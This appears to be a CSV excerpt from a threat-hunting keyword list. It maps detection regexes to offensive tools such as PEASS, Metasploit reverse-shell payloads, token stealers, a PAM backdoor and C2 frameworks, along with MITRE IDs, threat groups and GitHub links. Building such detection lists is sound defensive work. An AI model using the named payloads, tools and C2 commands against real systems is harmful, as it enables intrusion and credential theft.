"*linpeas_linux_amd64*",".{0,1000}linpeas_linux_amd64.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","#linux","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","51052"
"*linpeas_linux_arm*",".{0,1000}linpeas_linux_arm.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","51053"
"*linpeas_linux_arm64*",".{0,1000}linpeas_linux_arm64.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","#linux","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","51054"
"*linux/x64/meterpreter/reverse_tcp*",".{0,1000}linux\/x64\/meterpreter\/reverse_tcp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","51065"
"*linux/x64/shell_reverse_tcp*",".{0,1000}linux\/x64\/shell_reverse_tcp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","51066"
"*linux:feeds:v2 (by /u/pico-sh)*",".{0,1000}linux\:feeds\:v2\s\(by\s\/u\/pico\-sh\).{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#useragent","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","51067"
"*linux_hostrecon*",".{0,1000}linux_hostrecon.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","#linux","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","51069"
"*linux_hostrecon.*",".{0,1000}linux_hostrecon\..{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","#linux","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","51070"
"*Linux_LPE_eBPF_CVE*",".{0,1000}Linux_LPE_eBPF_CVE.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","#linux","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","51071"
"*linux_sudo_cve-2017-1000367.c*",".{0,1000}linux_sudo_cve\-2017\-1000367\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","51072"
"*linux_trap_command.py*",".{0,1000}linux_trap_command\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","#linux","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","51073"
"*linux_x64_agent --report * -l * -s ph4ntom*",".{0,1000}linux_x64_agent\s\-\-report\s.{0,1000}\s\-l\s.{0,1000}\s\-s\sph4ntom.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","#linux","N/A","10","10","2989","422","2025-04-05T14:48:38Z","2019-11-15T03:25:50Z","51074"
"*LinuxARMLELF32.py*",".{0,1000}LinuxARMLELF32\.py.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE  ELF  Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/secretsquirrel/the-backdoor-factory","1","1","#linux","N/A","10","10","3369","788","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z","51077"
"*linux-exploit-suggester*",".{0,1000}linux\-exploit\-suggester.{0,1000}","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","1","#linux","N/A","10","10","2523","459","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z","51078"
"*linux-exploit-suggester*",".{0,1000}linux\-exploit\-suggester.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","51079"
"*linux-exploit-suggester.sh*",".{0,1000}linux\-exploit\-suggester\.sh.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","51080"
"*linux-exploit-suggester.sh*",".{0,1000}linux\-exploit\-suggester\.sh.{0,1000}","offensive_tool_keyword","Orc","Orc is a post-exploitation framework for Linux written in Bash","T1059.004 - T1036.005 - T1070.002 - T1012 - T1082 - T1003 - T1555.003 - T1049 - T1134.001 - T1202","TA0005 - TA0003 - TA0002 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/zMarch/Orc","1","1","#linux","N/A","9","4","395","53","2019-11-12T18:21:27Z","2018-08-16T11:31:39Z","51081"
"*linux-pam-backdoor-master*",".{0,1000}linux\-pam\-backdoor\-master.{0,1000}","offensive_tool_keyword","linux-pam-backdoor","Linux PAM Backdoor","T1547.001 - T1556.003","TA0003 - TA0004","N/A","N/A","Persistence","https://github.com/zephrax/linux-pam-backdoor","1","1","#linux","N/A","10","4","328","85","2023-11-13T11:29:44Z","2017-06-08T21:14:34Z","51083"
"*linuxprivchecker*",".{0,1000}linuxprivchecker.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","#linux","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","51084"
"*linuxprivchecker.py*",".{0,1000}linuxprivchecker.{0,1000}","offensive_tool_keyword","linuxprivchecker","search for common privilege escalation vectors such as world writable files. misconfigurations. clear-text passwords and applicable exploits","T1210.001 - T1082 - T1088 - T1547.001","TA0002 - TA0004 - TA0006 - TA0007 - TA0008","N/A","N/A","Exploitation tool","https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py","1","0","#linux","N/A","7","10","1645","524","2022-01-31T10:32:08Z","2016-04-19T13:31:46Z","51085"
"*linux-rds-exploit.c*",".{0,1000}linux\-rds\-exploit\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","51086"
"*linux-smart-enumeration.sh*",".{0,1000}linux\-smart\-enumeration\.sh.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","51087"
"*linux-smart-enumeration-master*",".{0,1000}linux\-smart\-enumeration\-master.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","#linux","N/A","9","10","3575","584","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z","51088"
"*linWinPwn-*",".{0,1000}linWinPwn\-.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","51089"
"*linWinPwn.*",".{0,1000}linWinPwn\..{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","51090"
"*lion2john.pl*",".{0,1000}lion2john\.pl.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","51091"
"*lion2john-alt.pl*",".{0,1000}lion2john\-alt\.pl.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","51092"
"*LiquidSnake.exe*",".{0,1000}LiquidSnake\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","LiquidSnake is a tool that allows operators to perform fileless Lateral Movement using WMI Event Subscriptions and GadgetToJScript","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RiccardoAncarani/LiquidSnake","1","1","N/A","N/A","10","10","332","46","2021-09-01T11:53:30Z","2021-08-31T12:23:01Z","51093"
"*lirncvjfmdhv6samxvvlohfqx7jklfxoxj7xn3fh7qeabs3taemdsdqd.onion*",".{0,1000}lirncvjfmdhv6samxvvlohfqx7jklfxoxj7xn3fh7qeabs3taemdsdqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51094"
"*List the named pipes on a remote system*",".{0,1000}List\sthe\snamed\spipes\son\sa\sremote\ssystem.{0,1000}","offensive_tool_keyword","RemotePipeList","A small tool that can list the named pipes bound on a remote system.","T1047 - T1021.006","TA0008 - TA0002","N/A","N/A","Discovery","https://github.com/outflanknl/C2-Tool-Collection/tree/main/Other/RemotePipeList","1","0","#content","N/A","10","10","1213","204","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z","51095"
"*list/steal token of user <user>*default NT AUTHORITY\\SYSTEM for comamnd execution*",".{0,1000}list\/steal\stoken\sof\suser\s\<user\>.{0,1000}default\sNT\sAUTHORITY\\\\SYSTEM\sfor\scomamnd\sexecution.{0,1000}","offensive_tool_keyword","TokenStealer","stealing Windows tokens","T1134 - T1055","TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/decoder-it/TokenStealer","1","0","#content","N/A","10","2","164","29","2023-10-25T14:08:57Z","2023-10-24T13:06:37Z","51096"
"*list_backdoors*",".{0,1000}list_backdoors.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","51097"
"*List_Privileges /Process:powershell*",".{0,1000}List_Privileges\s\/Process\:powershell.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","N/A","10","1038","201","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z","51098"
"*list_tcppivot*",".{0,1000}list_tcppivot.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","51099"
"*list_tokens -u*",".{0,1000}list_tokens\s\-u.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002  -  T1021","TA0001 - TA0002 - TA0003","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Exploitation tool","N/A","1","0","N/A","Incognito","10","10","N/A","N/A","N/A","N/A","51100"
"*ListAccountsWithSPN*",".{0,1000}ListAccountsWithSPN.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","51101"
"*List-AllMailboxAndPST.ps1*",".{0,1000}List\-AllMailboxAndPST\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","51102"
"*ListAllUsers.ps1*",".{0,1000}ListAllUsers\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","51103"
"*ListDescriptionContainsPass*",".{0,1000}ListDescriptionContainsPass.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","51104"
"*listdlls64.exe*",".{0,1000}listdlls64\.exe.{0,1000}","offensive_tool_keyword","UnlinkDLL","DLL Unlinking from InLoadOrderModuleList - InMemoryOrderModuleList - InInitializationOrderModuleList and LdrpHashTable","T1055 - T1027 - T1070","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/UnlinkDLL","1","1","N/A","N/A","7","1","57","13","2023-12-15T12:04:00Z","2023-12-13T14:37:33Z","51105"
"*ListDomainAdmins*",".{0,1000}ListDomainAdmins.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","51106"
"*ListDomainGroupsLocalAdmin*",".{0,1000}ListDomainGroupsLocalAdmin.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","51107"
"*listen(58082* '0.0.0.0'*",".{0,1000}listen\(58082.{0,1000}\s\'0\.0\.0\.0\'.{0,1000}","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","0","N/A","N/A","10","5","487","51","2024-11-21T17:36:55Z","2023-08-02T14:30:41Z","51108"
"*listen_http 0.0.0.0 8080 *.php operation1*",".{0,1000}listen_http\s0\.0\.0\.0\s8080\s.{0,1000}\.php\soperation1.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1059.001 - T1105 - T1071.001 - T1219 - T1573","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","0","N/A","N/A","10","10","750","156","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z","51109"
"*Listening for incoming ICMP packets...*",".{0,1000}Listening\sfor\sincoming\sICMP\spackets\.\.\..{0,1000}","offensive_tool_keyword","PILOT","Pilot is a simplified system designed for the stealthy transfer of files across networks using ICMP","T1048.001 - T1573.001 - T1020","TA0010 - TA0002 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/dahvidschloss/PILOT","1","0","N/A","N/A","9","1","79","7","2024-04-16T18:24:44Z","2024-04-03T15:04:33Z","51110"
"*Listening for incoming requests on http://localhost:$port/*",".{0,1000}Listening\sfor\sincoming\srequests\son\shttp\:\/\/localhost\:\$port\/.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","#content","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","51111"
"*List-GraphRunnerModules*",".{0,1000}List\-GraphRunnerModules.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","51112"
"*List-KeyCredentials -target *",".{0,1000}List\-KeyCredentials\s\-target\s.{0,1000}","offensive_tool_keyword","KeyCredentialLink","Add Shadow Credentials to a target object by editing their msDS-KeyCredentialLink attribute","T1098 - T1550","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/Leo4j/KeyCredentialLink","1","0","N/A","N/A","10","1","21","3","2024-06-05T13:44:39Z","2024-06-05T13:19:49Z","51113"
"*listLocalAdminAccess(*",".{0,1000}listLocalAdminAccess\(.{0,1000}","offensive_tool_keyword","spraykatz","Spraykatz is a tool without any pretention able to retrieve credentials on Windows machines and large Active Directory environments.","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008","TA0003 - TA0004 - TA0007","N/A","N/A","Credential Access","https://github.com/aas-n/spraykatz","1","0","N/A","N/A","9","8","763","121","2020-06-20T12:14:00Z","2019-09-09T14:38:28Z","51114"
"*ListMetasploitPayloads*",".{0,1000}ListMetasploitPayloads.{0,1000}","offensive_tool_keyword","empire","Empire scripts argument. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","51115"
"*ListNeverLoggedInAccounts*",".{0,1000}ListNeverLoggedInAccounts.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","51116"
"*ListPasswordNeverExpire*",".{0,1000}ListPasswordNeverExpire.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","51117"
"*listPwnableTargets(*",".{0,1000}listPwnableTargets\(.{0,1000}","offensive_tool_keyword","spraykatz","Spraykatz is a tool without any pretention able to retrieve credentials on Windows machines and large Active Directory environments.","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008","TA0003 - TA0004 - TA0007","N/A","N/A","Credential Access","https://github.com/aas-n/spraykatz","1","0","N/A","N/A","9","8","763","121","2020-06-20T12:14:00Z","2019-09-09T14:38:28Z","51118"
"*lists.tor2web.org*",".{0,1000}lists\.tor2web\.org.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","51119"
